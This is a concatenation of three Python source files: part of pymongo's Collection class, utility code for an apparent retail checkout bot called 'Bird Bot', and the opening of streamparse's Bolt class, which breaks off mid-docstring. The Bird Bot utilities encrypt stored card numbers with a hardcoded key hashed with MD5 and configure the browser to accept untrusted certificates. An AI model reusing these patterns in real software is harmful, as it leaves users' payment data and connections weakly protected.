group["cond"] = condition
group["initial"] = initial
if finalize is not None:
group["finalize"] = Code(finalize)
cmd = SON([("group", group)])
collation = validate_collation_or_none(kwargs.pop('collation', None))
cmd.update(kwargs)
with self._socket_for_reads(session=None) as (sock_info, slave_ok):
return self._command(sock_info, cmd, slave_ok,
collation=collation)["retval"]
def rename(self, new_name, session=None, **kwargs):
"""Rename this collection.
If operating in auth mode, client must be authorized as an
admin to perform this operation. Raises :class:`TypeError` if
`new_name` is not an instance of :class:`basestring`
(:class:`str` in python 3). Raises :class:`~pymongo.errors.InvalidName`
if `new_name` is not a valid collection name.
:Parameters:
- `new_name`: new name for this collection
- `session` (optional): a
:class:`~pymongo.client_session.ClientSession`.
- `**kwargs` (optional): additional arguments to the rename command
may be passed as keyword arguments to this helper method
(i.e. ``dropTarget=True``)
.. note:: The :attr:`~pymongo.collection.Collection.write_concern` of
this collection is automatically applied to this operation when using
MongoDB >= 3.4.
.. versionchanged:: 3.6
Added ``session`` parameter.
.. versionchanged:: 3.4
Apply this collection's write concern automatically to this operation
when connected to MongoDB >= 3.4.
"""
if not isinstance(new_name, string_type):
raise TypeError("new_name must be an "
"instance of %s" % (string_type.__name__,))
if not new_name or ".." in new_name:
raise InvalidName("collection names cannot be empty")
if new_name[0] == "." or new_name[-1] == ".":
raise InvalidName("collecion names must not start or end with '.'")
if "$" in new_name and not new_name.startswith("oplog.$main"):
raise InvalidName("collection names must not contain '$'")
new_name = "%s.%s" % (self.__database.name, new_name)
cmd = SON([("renameCollection", self.__full_name), ("to", new_name)])
cmd.update(kwargs)
write_concern = self._write_concern_for_cmd(cmd, session)
with self._socket_for_writes() as sock_info:
with self.__database.client._tmp_session(session) as s:
return sock_info.command(
'admin', cmd,
write_concern=write_concern,
parse_write_concern_error=True,
session=s, client=self.__database.client)
def distinct(self, key, filter=None, session=None, **kwargs):
"""Get a list of distinct values for `key` among all documents
in this collection.
Raises :class:`TypeError` if `key` is not an instance of
:class:`basestring` (:class:`str` in python 3).
All optional distinct parameters should be passed as keyword arguments
to this method. Valid options include:
- `maxTimeMS` (int): The maximum amount of time to allow the count
command to run, in milliseconds.
- `collation` (optional): An instance of
:class:`~pymongo.collation.Collation`. This option is only supported
on MongoDB 3.4 and above.
The :meth:`distinct` method obeys the :attr:`read_preference` of
this :class:`Collection`.
:Parameters:
- `key`: name of the field for which we want to get the distinct
values
- `filter` (optional): A query document that specifies the documents
from which to retrieve the distinct values.
- `session` (optional): a
:class:`~pymongo.client_session.ClientSession`.
- `**kwargs` (optional): See list of options above.
.. versionchanged:: 3.6
Added ``session`` parameter.
.. versionchanged:: 3.4
Support the `collation` option.
"""
if not isinstance(key, string_type):
raise TypeError("key must be an "
"instance of %s" % (string_type.__name__,))
cmd = SON([("distinct", self.__name),
("key", key)])
if filter is not None:
if "query" in kwargs:
raise ConfigurationError("can't pass both filter and query")
kwargs["query"] = filter
collation = validate_collation_or_none(kwargs.pop('collation', None))
cmd.update(kwargs)
with self._socket_for_reads(session) as (sock_info, slave_ok):
return self._command(sock_info, cmd, slave_ok,
read_concern=self.read_concern,
collation=collation, session=session)["values"]
def map_reduce(self, map, reduce, out, full_response=False, session=None,
**kwargs):
"""Perform a map/reduce operation on this collection.
If `full_response` is ``False`` (default) returns a
:class:`~pymongo.collection.Collection` instance containing
the results of the operation. Otherwise, returns the full
response from the server to the `map reduce command`_.
:Parameters:
- `map`: map function (as a JavaScript string)
- `reduce`: reduce function (as a JavaScript string)
- `out`: output collection name or `out object` (dict). See
the `map reduce command`_ documentation for available options.
Note: `out` options are order sensitive. :class:`~bson.son.SON`
can be used to specify multiple options.
e.g. SON([('replace', <collection name>), ('db', <database name>)])
- `full_response` (optional): if ``True``, return full response to
this command - otherwise just return the result collection
- `session` (optional): a
:class:`~pymongo.client_session.ClientSession`.
- `**kwargs` (optional): additional arguments to the
`map reduce command`_ may be passed as keyword arguments to this
helper method, e.g.::
>>> db.test.map_reduce(map, reduce, "myresults", limit=2)
.. note:: The :meth:`map_reduce` method does **not** obey the
:attr:`read_preference` of this :class:`Collection`. To run
mapReduce on a secondary use the :meth:`inline_map_reduce` method
instead.
.. note:: The :attr:`~pymongo.collection.Collection.write_concern` of
this collection is automatically applied to this operation (if the
output is not inline) when using MongoDB >= 3.4.
.. versionchanged:: 3.6
Added ``session`` parameter.
.. versionchanged:: 3.4
Apply this collection's write concern automatically to this operation
when connected to MongoDB >= 3.4.
.. seealso:: :doc:`/examples/aggregation`
.. versionchanged:: 3.4
Added the `collation` option.
.. versionchanged:: 2.2
Removed deprecated arguments: merge_output and reduce_output
.. _map reduce command: http://docs.mongodb.org/manual/reference/command/mapReduce/
.. mongodoc:: mapreduce
"""
if not isinstance(out, (string_type, abc.Mapping)):
raise TypeError("'out' must be an instance of "
"%s or a mapping" % (string_type.__name__,))
cmd = SON([("mapreduce", self.__name),
("map", map),
("reduce", reduce),
("out", out)])
collation = validate_collation_or_none(kwargs.pop('collation', None))
cmd.update(kwargs)
inline = 'inline' in cmd['out']
sock_ctx, read_pref = self._socket_for_primary_reads(session)
with sock_ctx as (sock_info, slave_ok):
if (sock_info.max_wire_version >= 4 and 'readConcern' not in cmd and
inline):
read_concern = self.read_concern
else:
read_concern = None
if 'writeConcern' not in cmd and not inline:
write_concern = self._write_concern_for(session)
else:
write_concern = None
response = self._command(
sock_info, cmd, slave_ok, read_pref,
read_concern=read_concern,
write_concern=write_concern,
collation=collation, session=session)
if full_response or not response.get('result'):
return response
elif isinstance(response['result'], dict):
dbase = response['result']['db']
coll = response['result']['collection']
return self.__database.client[dbase][coll]
else:
return self.__database[response["result"]]
def inline_map_reduce(self, map, reduce, full_response=False, session=None,
**kwargs):
"""Perform an inline map/reduce operation on this collection.
Perform the map/reduce operation on the server in RAM. A result
collection is not created. The result set is returned as a list
of documents.
If `full_response` is ``False`` (default) returns the
result documents in a list. Otherwise, returns the full
response from the server to the `map reduce command`_.
The :meth:`inline_map_reduce` method obeys the :attr:`read_preference`
of this :class:`Collection`.
:Parameters:
- `map`: map function (as a JavaScript string)
- `reduce`: reduce function (as a JavaScript string)
- `full_response` (optional): if ``True``, return full response to
this command - otherwise just return the result collection
- `session` (optional): a
:class:`~pymongo.client_session.ClientSession`.
- `**kwargs` (optional): additional arguments to the
`map reduce command`_ may be passed as keyword arguments to this
helper method, e.g.::
>>> db.test.inline_map_reduce(map, reduce, limit=2)
.. versionchanged:: 3.6
Added ``session`` parameter.
.. versionchanged:: 3.4
Added the `collation` option.
"""
cmd = SON([("mapreduce", self.__name),
("map", map),
("reduce", reduce),
("out", {"inline": 1})])
collation = validate_collation_or_none(kwargs.pop('collation', None))
cmd.update(kwargs)
with self._socket_for_reads(session) as (sock_info, slave_ok):
if sock_info.max_wire_version >= 4 and 'readConcern' not in cmd:
res = self._command(sock_info, cmd, slave_ok,
read_concern=self.read_concern,
collation=collation, session=session)
else:
res = self._command(sock_info, cmd, slave_ok,
collation=collation, session=session)
if full_response:
return res
else:
return res.get("results")
def _write_concern_for_cmd(self, cmd, session):
raw_wc = cmd.get('writeConcern')
if raw_wc is not None:
return WriteConcern(**raw_wc)
else:
return self._write_concern_for(session)
def __find_and_modify(self, filter, projection, sort, upsert=None,
return_document=ReturnDocument.BEFORE,
array_filters=None, session=None, **kwargs):
"""Internal findAndModify helper."""
common.validate_is_mapping("filter", filter)
if not isinstance(return_document, bool):
raise ValueError("return_document must be "
"ReturnDocument.BEFORE or ReturnDocument.AFTER")
collation = validate_collation_or_none(kwargs.pop('collation', None))
cmd = SON([("findAndModify", self.__name),
("query", filter),
("new", return_document)])
cmd.update(kwargs)
if projection is not None:
cmd["fields"] = helpers._fields_list_to_dict(projection,
"projection")
if sort is not None:
cmd["sort"] = helpers._index_document(sort)
if upsert is not None:
common.validate_boolean("upsert", upsert)
cmd["upsert"] = upsert
write_concern = self._write_concern_for_cmd(cmd, session)
def _find_and_modify(session, sock_info, retryable_write):
if array_filters is not None:
if sock_info.max_wire_version < 6:
raise ConfigurationError(
'Must be connected to MongoDB 3.6+ to use '
'arrayFilters.')
if not write_concern.acknowledged:
raise ConfigurationError(
'arrayFilters is unsupported for unacknowledged '
'writes.')
cmd["arrayFilters"] = array_filters
if (sock_info.max_wire_version >= 4 and
not write_concern.is_server_default):
cmd['writeConcern'] = write_concern.document
out = self._command(sock_info, cmd,
read_preference=ReadPreference.PRIMARY,
write_concern=write_concern,
allowable_errors=[_NO_OBJ_ERROR],
collation=collation, session=session,
retryable_write=retryable_write)
_check_write_command_response(out)
return out.get("value")
return self.__database.client._retryable_write(
write_concern.acknowledged, _find_and_modify, session)
def find_one_and_delete(self, filter,
projection=None, sort=None, session=None, **kwargs):
"""Finds a single document and deletes it, returning the document.
>>> db.test.count({'x': 1})
2
>>> db.test.find_one_and_delete({'x': 1})
{u'x': 1, u'_id': ObjectId('54f4e12bfba5220aa4d6dee8')}
>>> db.test.count({'x': 1})
1
If multiple documents match *filter*, a *sort* can be applied.
>>> for doc in db.test.find({'x': 1}):
... print(doc)
...
{u'x': 1, u'_id': 0}
{u'x': 1, u'_id': 1}
{u'x': 1, u'_id': 2}
>>> db.test.find_one_and_delete(
... {'x': 1}, sort=[('_id', pymongo.DESCENDING)])
{u'x': 1, u'_id': 2}
The *projection* option can be used to limit the fields returned.
>>> db.test.find_one_and_delete({'x': 1}, projection={'_id': False})
{u'x': 1}
:Parameters:
- `filter`: A query that matches the document to delete.
- `projection` (optional): a list of field names that should be
returned in the result document or a mapping specifying the fields
to include or exclude. If `projection` is a list "_id" will
always be returned. Use a mapping to exclude fields from
the result (e.g. projection={'_id': False}).
- `sort` (optional): a list of (key, direction) pairs
specifying the sort order for the query. If multiple documents
match the query, they are sorted and the first is deleted.
- `session` (optional): a
:class:`~pymongo.client_session.ClientSession`.
- `**kwargs` (optional): additional command arguments can be passed
as keyword arguments (for example maxTimeMS can be used with
recent server versions).
.. versionchanged:: 3.6
Added ``session`` parameter.
.. versionchanged:: 3.2
Respects write concern.
.. warning:: Starting in PyMongo 3.2, this command uses the
:class:`~pymongo.write_concern.WriteConcern` of this
:class:`~pymongo.collection.Collection` when connected to MongoDB >=
3.2. Note that using an elevated write concern with this command may
be slower compared to using the default write concern.
.. versionchanged:: 3.4
Added the `collation` option.
.. versionadded:: 3.0
"""
kwargs['remove'] = True
return self.__find_and_modify(filter, projection, sort,
session=session, **kwargs)
def find_one_and_replace(self, filter, replacement,
projection=None, sort=None, upsert=False,
return_document=ReturnDocument.BEFORE,
session=None, **kwargs):
"""Finds a single document and replaces it, returning either the
original or the replaced document.
The :meth:`find_one_and_replace` method differs from
:meth:`find_one_and_update` by replacing the document matched by
*filter*, rather than modifying the existing document.
>>> for doc in db.test.find({}):
... print(doc)
...
{u'x': 1, u'_id': 0}
{u'x': 1, u'_id': 1}
{u'x': 1, u'_id': 2}
>>> db.test.find_one_and_replace({'x': 1}, {'y': 1})
{u'x': 1, u'_id': 0}
>>> for doc in db.test.find({}):
... print(doc)
...
{u'y': 1, u'_id': 0}
{u'x': 1, u'_id': 1}
{u'x': 1, u'_id': 2}
:Parameters:
- `filter`: A query that matches the document to replace.
- `replacement`: The replacement document.
- `projection` (optional): A list of field names that should be
returned in the result document or a mapping specifying the fields
to include or exclude. If `projection` is a list "_id" will
always be returned. Use a mapping to exclude fields from
the result (e.g. projection={'_id': False}).
- `sort` (optional): a list of (key, direction) pairs
specifying the sort order for the query. If multiple documents
match the query, they are sorted and the first is replaced.
- `upsert` (optional): When ``True``, inserts a new document if no
document matches the query. Defaults to ``False``.
- `return_document`: If
:attr:`ReturnDocument.BEFORE` (the default),
returns the original document before it was replaced, or ``None``
if no document matches. If
:attr:`ReturnDocument.AFTER`, returns the replaced
or inserted document.
- `session` (optional): a
:class:`~pymongo.client_session.ClientSession`.
- `**kwargs` (optional): additional command arguments can be passed
as keyword arguments (for example maxTimeMS can be used with
recent server versions).
.. versionchanged:: 3.6
Added ``session`` parameter.
.. versionchanged:: 3.4
Added the `collation` option.
.. versionchanged:: 3.2
Respects write concern.
.. warning:: Starting in PyMongo 3.2, this command uses the
:class:`~pymongo.write_concern.WriteConcern` of this
:class:`~pymongo.collection.Collection` when connected to MongoDB >=
3.2. Note that using an elevated write concern with this command may
be slower compared to using the default write concern.
.. versionadded:: 3.0
"""
common.validate_ok_for_replace(replacement)
kwargs['update'] = replacement
return self.__find_and_modify(filter, projection,
sort, upsert, return_document,
session=session, **kwargs)
def find_one_and_update(self, filter, update,
projection=None, sort=None, upsert=False,
return_document=ReturnDocument.BEFORE,
array_filters=None, session=None, **kwargs):
"""Finds a single document and updates it, returning either the
original or the updated document.
>>> db.test.find_one_and_update(
... {'_id': 665}, {'$inc': {'count': 1}, '$set': {'done': True}})
{u'_id': 665, u'done': False, u'count': 25}}
By default :meth:`find_one_and_update` returns the original version of
the document before the update was applied. To return the updated
version of the document instead, use the *return_document* option.
>>> from pymongo import ReturnDocument
>>> db.example.find_one_and_update(
... {'_id': 'userid'},
... {'$inc': {'seq': 1}},
... return_document=ReturnDocument.AFTER)
{u'_id': u'userid', u'seq': 1}
You can limit the fields returned with the *projection* option.
>>> db.example.find_one_and_update(
... {'_id': 'userid'},
... {'$inc': {'seq': 1}},
... projection={'seq': True, '_id': False},
... return_document=ReturnDocument.AFTER)
{u'seq': 2}
The *upsert* option can be used to create the document if it doesn't
already exist.
>>> db.example.delete_many({}).deleted_count
1
>>> db.example.find_one_and_update(
... {'_id': 'userid'},
... {'$inc': {'seq': 1}},
... projection={'seq': True, '_id': False},
... upsert=True,
... return_document=ReturnDocument.AFTER)
{u'seq': 1}
If multiple documents match *filter*, a *sort* can be applied.
>>> for doc in db.test.find({'done': True}):
... print(doc)
...
{u'_id': 665, u'done': True, u'result': {u'count': 26}}
{u'_id': 701, u'done': True, u'result': {u'count': 17}}
>>> db.test.find_one_and_update(
... {'done': True},
... {'$set': {'final': True}},
... sort=[('_id', pymongo.DESCENDING)])
{u'_id': 701, u'done': True, u'result': {u'count': 17}}
:Parameters:
- `filter`: A query that matches the document to update.
- `update`: The update operations to apply.
- `projection` (optional): A list of field names that should be
returned in the result document or a mapping specifying the fields
to include or exclude. If `projection` is a list "_id" will
always be returned. Use a dict to exclude fields from
the result (e.g. projection={'_id': False}).
- `sort` (optional): a list of (key, direction) pairs
specifying the sort order for the query. If multiple documents
match the query, they are sorted and the first is updated.
- `upsert` (optional): When ``True``, inserts a new document if no
document matches the query. Defaults to ``False``.
- `return_document`: If
:attr:`ReturnDocument.BEFORE` (the default),
returns the original document before it was updated, or ``None``
if no document matches. If
:attr:`ReturnDocument.AFTER`, returns the updated
or inserted document.
- `array_filters` (optional): A list of filters specifying which
array elements an update should apply. Requires MongoDB 3.6+.
- `session` (optional): a
:class:`~pymongo.client_session.ClientSession`.
- `**kwargs` (optional): additional command arguments can be passed
as keyword arguments (for example maxTimeMS can be used with
recent server versions).
.. versionchanged:: 3.6
Added the `array_filters` and `session` options.
.. versionchanged:: 3.4
Added the `collation` option.
.. versionchanged:: 3.2
Respects write concern.
.. warning:: Starting in PyMongo 3.2, this command uses the
:class:`~pymongo.write_concern.WriteConcern` of this
:class:`~pymongo.collection.Collection` when connected to MongoDB >=
3.2. Note that using an elevated write concern with this command may
be slower compared to using the default write concern.
.. versionadded:: 3.0
"""
common.validate_ok_for_update(update)
common.validate_list_or_none('array_filters', array_filters)
kwargs['update'] = update
return self.__find_and_modify(filter, projection,
sort, upsert, return_document,
array_filters, session=session, **kwargs)
def save(self, to_save, manipulate=True, check_keys=True, **kwargs):
"""Save a document in this collection.
**DEPRECATED** - Use :meth:`insert_one` or :meth:`replace_one` instead.
.. versionchanged:: 3.0
Removed the `safe` parameter. Pass ``w=0`` for unacknowledged write
operations.
"""
warnings.warn("save is deprecated. Use insert_one or replace_one "
"instead", DeprecationWarning, stacklevel=2)
common.validate_is_document_type("to_save", to_save)
write_concern = None
collation = validate_collation_or_none(kwargs.pop('collation', None))
if kwargs:
write_concern = WriteConcern(**kwargs)
if not (isinstance(to_save, RawBSONDocument) or "_id" in to_save):
return self._insert(
to_save, True, check_keys, manipulate, write_concern)
else:
self._update_retryable(
{"_id": to_save["_id"]}, to_save, True,
check_keys, False, manipulate, write_concern,
collation=collation)
return to_save.get("_id")
def insert(self, doc_or_docs, manipulate=True,
check_keys=True, continue_on_error=False, **kwargs):
"""Insert a document(s) into this collection.
**DEPRECATED** - Use :meth:`insert_one` or :meth:`insert_many` instead.
.. versionchanged:: 3.0
Removed the `safe` parameter. Pass ``w=0`` for unacknowledged write
operations.
"""
warnings.warn("insert is deprecated. Use insert_one or insert_many "
"instead.", DeprecationWarning, stacklevel=2)
write_concern = None
if kwargs:
write_concern = WriteConcern(**kwargs)
return self._insert(doc_or_docs, not continue_on_error,
check_keys, manipulate, write_concern)
def update(self, spec, document, upsert=False, manipulate=False,
multi=False, check_keys=True, **kwargs):
"""Update a document(s) in this collection.
**DEPRECATED** - Use :meth:`replace_one`, :meth:`update_one`, or
:meth:`update_many` instead.
.. versionchanged:: 3.0
Removed the `safe` parameter. Pass ``w=0`` for unacknowledged write
operations.
"""
warnings.warn("update is deprecated. Use replace_one, update_one or "
"update_many instead.", DeprecationWarning, stacklevel=2)
common.validate_is_mapping("spec", spec)
common.validate_is_mapping("document", document)
if document:
# If a top level key begins with '$' this is a modify operation
# and we should skip key validation. It doesn't matter which key
# we check here. Passing a document with a mix of top level keys
# starting with and without a '$' is invalid and the server will
# raise an appropriate exception.
first = next(iter(document))
if first.startswith('$'):
check_keys = False
write_concern = None
collation = validate_collation_or_none(kwargs.pop('collation', None))
if kwargs:
write_concern = WriteConcern(**kwargs)
return self._update_retryable(
spec, document, upsert, check_keys, multi, manipulate,
write_concern, collation=collation)
def remove(self, spec_or_id=None, multi=True, **kwargs):
"""Remove a document(s) from this collection.
**DEPRECATED** - Use :meth:`delete_one` or :meth:`delete_many` instead.
.. versionchanged:: 3.0
Removed the `safe` parameter. Pass ``w=0`` for unacknowledged write
operations.
"""
warnings.warn("remove is deprecated. Use delete_one or delete_many "
"instead.", DeprecationWarning, stacklevel=2)
if spec_or_id is None:
spec_or_id = {}
if not isinstance(spec_or_id, abc.Mapping):
spec_or_id = {"_id": spec_or_id}
write_concern = None
collation = validate_collation_or_none(kwargs.pop('collation', None))
if kwargs:
write_concern = WriteConcern(**kwargs)
return self._delete_retryable(
spec_or_id, multi, write_concern, collation=collation)
def find_and_modify(self, query={}, update=None,
upsert=False, sort=None, full_response=False,
manipulate=False, **kwargs):
"""Update and return an object.
**DEPRECATED** - Use :meth:`find_one_and_delete`,
:meth:`find_one_and_replace`, or :meth:`find_one_and_update` instead.
"""
warnings.warn("find_and_modify is deprecated, use find_one_and_delete"
", find_one_and_replace, or find_one_and_update instead",
DeprecationWarning, stacklevel=2)
if not update and not kwargs.get('remove', None):
raise ValueError("Must either update or remove")
if update and kwargs.get('remove', None):
raise ValueError("Can't do both update and remove")
# No need to include empty args
if query:
kwargs['query'] = query
if update:
kwargs['update'] = update
if upsert:
kwargs['upsert'] = upsert
if sort:
# Accept a list of tuples to match Cursor's sort parameter.
if isinstance(sort, list):
kwargs['sort'] = helpers._index_document(sort)
# Accept OrderedDict, SON, and dict with len == 1 so we
# don't break existing code already using find_and_modify.
elif (isinstance(sort, ORDERED_TYPES) or
isinstance(sort, dict) and len(sort) == 1):
warnings.warn("Passing mapping types for `sort` is deprecated,"
" use a list of (key, direction) pairs instead",
DeprecationWarning, stacklevel=2)
kwargs['sort'] = sort
else:
raise TypeError("sort must be a list of (key, direction) "
"pairs, a dict of len 1, or an instance of "
"SON or OrderedDict")
fields = kwargs.pop("fields", None)
if fields is not None:
kwargs["fields"] = helpers._fields_list_to_dict(fields, "fields")
collation = validate_collation_or_none(kwargs.pop('collation', None))
cmd = SON([("findAndModify", self.__name)])
cmd.update(kwargs)
write_concern = self._write_concern_for_cmd(cmd, None)
def _find_and_modify(session, sock_info, retryable_write):
if (sock_info.max_wire_version >= 4 and
not write_concern.is_server_default):
cmd['writeConcern'] = write_concern.document
result = self._command(
sock_info, cmd, read_preference=ReadPreference.PRIMARY,
allowable_errors=[_NO_OBJ_ERROR], collation=collation,
session=session, retryable_write=retryable_write)
_check_write_command_response(result)
return result
out = self.__database.client._retryable_write(
write_concern.acknowledged, _find_and_modify, None)
if not out['ok']:
if out["errmsg"] == _NO_OBJ_ERROR:
return None
else:
# Should never get here b/c of allowable_errors
raise ValueError("Unexpected Error: %s" % (out,))
if full_response:
return out
else:
document = out.get('value')
if manipulate:
document = self.__database._fix_outgoing(document, self)
return document
def __iter__(self):
return self
def __next__(self):
raise TypeError("'Collection' object is not iterable")
next = __next__
def __call__(self, *args, **kwargs):
"""This is only here so that some API misusages are easier to debug.
"""
if "." not in self.__name:
raise TypeError("'Collection' object is not callable. If you "
"meant to call the '%s' method on a 'Database' "
"object it is failing because no such method "
"exists." %
self.__name)
raise TypeError("'Collection' object is not callable. If you meant to "
"call the '%s' method on a 'Collection' object it is "
"failing because no such method exists." %
self.__name.split(".")[-1])
|
utils.py
|
try:
from Crypto import Random
from Crypto.Cipher import AES
except:
from Cryptodome import Random
from Cryptodome.Cipher import AES
from colorama import init, Fore, Back, Style
from datetime import datetime
from selenium import webdriver
from selenium.webdriver.firefox.options import Options
from selenium.common import exceptions
from webhook import DiscordWebhook, DiscordEmbed
import json, platform, darkdetect, random, settings, threading, hashlib, base64
normal_color = Fore.CYAN
e_key = "YnJ1aG1vbWVudA==".encode()
BLOCK_SIZE=16
if platform.system() == "Windows":
init(convert=True)
else:
init()
print(normal_color + "Welcome To Bird Bot")
class BirdLogger:
def ts(self):
return str(datetime.now())[:-7]
def normal(self,task_id,msg):
print(normal_color + "[{}][TASK {}] {}".format(self.ts(),task_id,msg))
def alt(self,task_id,msg):
print(Fore.MAGENTA + "[{}][TASK {}] {}".format(self.ts(),task_id,msg))
def error(self,task_id,msg):
print(Fore.RED + "[{}][TASK {}] {}".format(self.ts(),task_id,msg))
def success(self,task_id,msg):
print(Fore.GREEN + "[{}][TASK {}] {}".format(self.ts(),task_id,msg))
class Encryption:
def encrypt(self,msg):
IV = Random.new().read(BLOCK_SIZE)
aes = AES.new(self.trans(e_key), AES.MODE_CFB, IV)
return base64.b64encode(IV + aes.encrypt(msg.encode("utf-8")))
def decrypt(self,msg):
msg = base64.b64decode(msg)
IV = msg[:BLOCK_SIZE]
aes = AES.new(self.trans(e_key), AES.MODE_CFB, IV)
return aes.decrypt(msg[BLOCK_SIZE:])
def trans(self,key):
return hashlib.md5(key).digest()
def return_data(path):
with open(path,"r") as file:
data = json.load(file)
file.close()
return data
def write_data(path,data):
with open(path, "w") as file:
json.dump(data, file)
file.close()
def get_profile(profile_name):
profiles = return_data("./data/profiles.json")
for p in profiles:
if p["profile_name"] == profile_name:
try:
p["card_number"] = (Encryption().decrypt(p["card_number"].encode("utf-8"))).decode("utf-8")
except ValueError:
pass
return p
return None
def get_proxy(list_name):
if list_name == "Proxy List" or list_name == "None":
return False
proxies = return_data("./data/proxies.json")
for proxy_list in proxies:
if proxy_list["list_name"] == list_name:
return format_proxy(random.choice(proxy_list["proxies"].splitlines()))
return None
def format_proxy(proxy):
try:
proxy_parts = proxy.split(":")
ip, port, user, passw = proxy_parts[0], proxy_parts[1], proxy_parts[2], proxy_parts[3]
return {
"http": "http://{}:{}@{}:{}".format(user, passw, ip, port),
"https": "https://{}:{}@{}:{}".format(user, passw, ip, port)
}
except IndexError:
return {"http": "http://" + proxy, "https": "https://" + proxy}
def send_webhook(webhook_type,site,profile,task_id,image_url):
if settings.webhook !="":
webhook = DiscordWebhook(url=settings.webhook, username="Bird Bot", avatar_url="https://i.imgur.com/fy26LbM.png")
if webhook_type == "OP":
if not settings.webhook_on_order:
return
embed = DiscordEmbed(title="Order Placed",color=0x34c693)
elif webhook_type == "B":
if not settings.webhook_on_browser:
return
embed = DiscordEmbed(title="Complete Order in Browser",color=0xf2a689)
elif webhook_type == "PF":
if not settings.webhook_on_failed:
return
embed = DiscordEmbed(title="Payment Failed",color=0xfc5151)
else:
embed = DiscordEmbed(title=webhook_type, color=0xfc5151)
embed.set_footer(text="Via Bird Bot",icon_url="https://i.imgur.com/fy26LbM.png")
embed.add_embed_field(name="Site", value=site,inline=True)
embed.add_embed_field(name="Profile", value=profile,inline=True)
embed.add_embed_field(name="Task ID", value=task_id,inline=True)
embed.set_thumbnail(url=image_url)
webhook.add_embed(embed)
try:
webhook.execute()
except:
pass
def open_browser(link,cookies):
threading.Thread(target = start_browser, args=(link,cookies)).start()
def start_browser(link,cookies):
options = Options()
options.headless = False
options.log.level = "trace"
firefox_profile = webdriver.FirefoxProfile()
firefox_profile.accept_untrusted_certs = True
driver = webdriver.Firefox(
options=options,
firefox_profile=firefox_profile,
service_log_path="/dev/null",
)
driver.get(link)
for cookie in cookies:
driver.add_cookie({
"name": cookie["name"],
"value" : cookie["value"],
"domain" : cookie["domain"]
})
driver.get(link)
|
bolt.py
|
"""Base Bolt classes."""
from __future__ import absolute_import, print_function, unicode_literals
from collections import defaultdict
import os
import signal
import sys
import threading
import time
import warnings
import logging
from six import iteritems, reraise, PY3
from .base import Component
from .ipc import (read_handshake, read_tuple, read_task_ids, send_message,
json, Tuple)
log = logging.getLogger('streamparse.bolt')
class Bolt(Component):
"""The base class for all streamparse bolts.
For more information on bolts, consult Storm's
`Concepts documentation <http://storm.incubator.apache.org/documentation/Concepts.html>`_.
**Example**:
.. code-block:: python
from streamparse.bolt import Bolt
class SentenceSplitterBolt(Bolt):
def process(self, tup):
sentence = tup.values[0]
for word in sentence.split(" "):
self.emit([word])
"""
auto_anchor = True
"""A ``bool`` indicating whether or not the bolt should automatically
anchor emits to the incoming tuple ID. Tuple anchoring is how Storm
provides reliability, you can read more about `tuple anchoring in Storm's
docs <https://storm.incubator.apache.org/documentation/Guaranteeing-message-processing.html#what-is-storms-reliability-api>`_.
Default is ``True``.
"""
auto_ack = True
"""A ``bool`` indicating whether or not the bolt should automatically
acknowledge tuples after ``process()`` is called. Default is ``True``.
"""
auto_fail = True
"""A ``bool`` indicating whether or not the bolt should automatically fail
tuples when an exception occurs when the ``process()`` method is called.
Default is ``True``.
"""
# Using a list so Bolt and subclasses can have more than one current_tup
_current_tups = []
def initialize(self, storm_conf, context):
"""Called immediately after the initial handshake with Storm and before
the main run loop. A good place to initialize connections to data
sources.
:param storm_conf: the Storm configuration for this Bolt. This is the
configuration provided to the topology, merged in
with cluster configuration on the worker node.
:type storm_conf: dict
:param context: information about the component's place within the
topology such as: task IDs, inputs, outputs etc.
:type context: dict
"""
pass
def process(self, tup):
"""Process a single tuple :class:`streamparse.ipc.Tuple` of input
This should be overridden by subclasses.
:class:`streamparse.ipc.Tuple` objects contain metadata about which
component, stream and task it came from. The actual values of the
tuple can be accessed by calling ``tup.values``.
:param tup: the tuple to be processed.
:type tup: streamparse.ipc.Tuple
"""
raise NotImplementedError()
def emit(self, tup, stream=None, anchors=None, direct_task=None,
need_task_ids=None):
"""Emit a new tuple to a stream.
:param tup: the Tuple payload to send to Storm, should contain only
JSON-serializable data.
:type tup: list
:param stream: the ID of the stream to emit this tuple to. Specify
``None`` to emit to default stream.
:type stream: str
:param anchors: IDs the tuples (or :class:`streamparse.ipc.Tuple`
instances) which the emitted tuples should be anchored
to. If ``auto_anchor`` is set to ``True`` and
you have not specified ``anchors``, ``anchors`` will be
set to the incoming/most recent tuple ID(s).
:type anchors: list
:param direct_task: the task to send the tuple to.
:type direct_task: int
:param need_task_ids: indicate whether or not you'd like the task IDs
the tuple was emitted (default:
``True``).
:type need_task_ids: bool
:returns: a ``list`` of task IDs that the tuple was sent to. Note that
when specifying direct_task, this will be equal to
``[direct_task]``. If you specify ``need_task_ids=False``,
this function will return ``None``.
"""
if not isinstance(tup, list):
raise TypeError('All tuples must be lists, received {!r} instead.'
.format(type(tup)))
msg = {'command': 'emit', 'tuple': tup}
if anchors is None:
anchors = self._current_tups if self.auto_anchor else []
msg['anchors'] = [a.id if isinstance(a, Tuple) else a for a in anchors]
if stream is not None:
msg['stream'] = stream
if direct_task is not None:
msg['task'] = direct_task
if need_task_ids is None:
need_task_ids = True
elif need_task_ids is False:
# only need to send on False, Storm's default is True
msg['need_task_ids'] = need_task_ids
send_message(msg)
if need_task_ids == True:
downstream_task_ids = [direct_task] if direct_task is not None \
else read_task_ids()
return downstream_task_ids
else:
return None
def emit_many(self, tuples, stream=None, anchors=None, direct_task=None,
need_task_ids=None):
"""Emit multiple tuples.
:param tuples: a ``list`` containing ``list`` s of tuple payload data
to send to Storm. All tuples should contain only
JSON-serializable data.
:type tuples: list
:param stream: the ID of the steram to emit these tuples to. Specify
``None`` to emit to default stream.
:type stream: str
:param anchors: IDs the tuples (or :class:`streamparse.ipc.Tuple`
instances) which the emitted tuples should be anchored
to. If ``auto_anchor`` is set to ``True`` and
you have not specified ``anchors``, ``anchors`` will be
set to the incoming/most recent tuple ID(s).
:type anchors: list
:param direct_task: indicates the task to send the tuple to.
:type direct_task: int
:param need_task_ids: indicate whether or not you'd like the task IDs
the tuple was emitted (default:
``True``).
:type need_task_ids: bool
"""
if not isinstance(tuples, list):
raise TypeError('tuples should be a list of lists, received {!r}'
'instead.'.format(type(tuples)))
all_task_ids = []
for tup in tuples:
all_task_ids.append(self.emit(tup, stream=stream, anchors=anchors,
direct_task=direct_task,
need_task_ids=need_task_ids))
return all_task_ids
def ack(self, tup):
"""Indicate that processing of a tuple has succeeded.
:param tup: the tuple to acknowledge.
:type tup: str or Tuple
"""
tup_id = tup.id if isinstance(tup, Tuple) else tup
send_message({'command': 'ack', 'id': tup_id})
def fail(self, tup):
"""Indicate that processing of a tuple has failed.
